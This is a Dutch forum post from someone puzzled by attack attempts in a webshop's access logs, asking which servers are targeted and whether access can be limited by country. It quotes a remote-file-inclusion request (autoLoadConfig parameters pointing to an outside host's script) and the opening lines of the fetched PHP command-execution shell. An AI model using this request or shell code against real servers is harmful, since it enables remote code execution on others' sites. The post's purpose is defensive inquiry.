Kennis van me heeft een server draaien met een webshop. Regelmatig kom ik dit soort dingen in de log tegen (overigens ook op mijn eigen site, zonder webshop):
De brunei-rocks is overigens niet van mijn kennis, de /winkel/ directory wel, maar het wordt op deze manier opgeroepen. De site waarop het uit te voeren script staat, is altijd de laatstgenoemde site, in dit geval dat moscowinternational ding.Code:GET /winkel/www.brunei-rocks.com/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.moscowinternation....xxxxxx
Ook de Get methodes zijn verschillend maar altijd met die autoLoadConfig erbij. Het wemelt ervan in de acces logs van httpd.
Is dit nu een poging waarmee je windows servers, linux servers of beiden kunt hacken?
Wat er in feite gebeurd is dat er op laatstgenoemde site een script wordt opgeroepen. Diverse sites/domeinen kunnen hiervoor gebruikt worden, je komt ook verwijzingen naar .jpg bestanden tegen, maar het maakt allemaal niet uit. Ga je ze oproepen betreffen het allemaal script files met dit soort code erin:
Uit veiligheidsoverwegingen noem ik niet de complete sites en zijn dit ook maar de eerste paar regels van een compleet script.Code:<?php echo "Mic22"; $cmd="id"; $eseguicmd=ex($cmd); echo $eseguicmd; function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("\n",$res);
Gelukkig lukt het de hackers niet om te doen wat ze willen maar het maakt me nieuwsgierig omtrent welk soort server ze willen hacken.
Als het alleen op windows servers van toepassing is dan slaap ik een stuk lekkerder.
Is het trouwens mogelijk om je server op "land" te beperken, zodat bijv. alleen .nl .be en .de toegang hebben tot je webserver?
En de rest of domeinen die geen reverse lookup laten zien gewoon een denied krijgen c.q. automatisch geweerd worden?

Likes:



Quote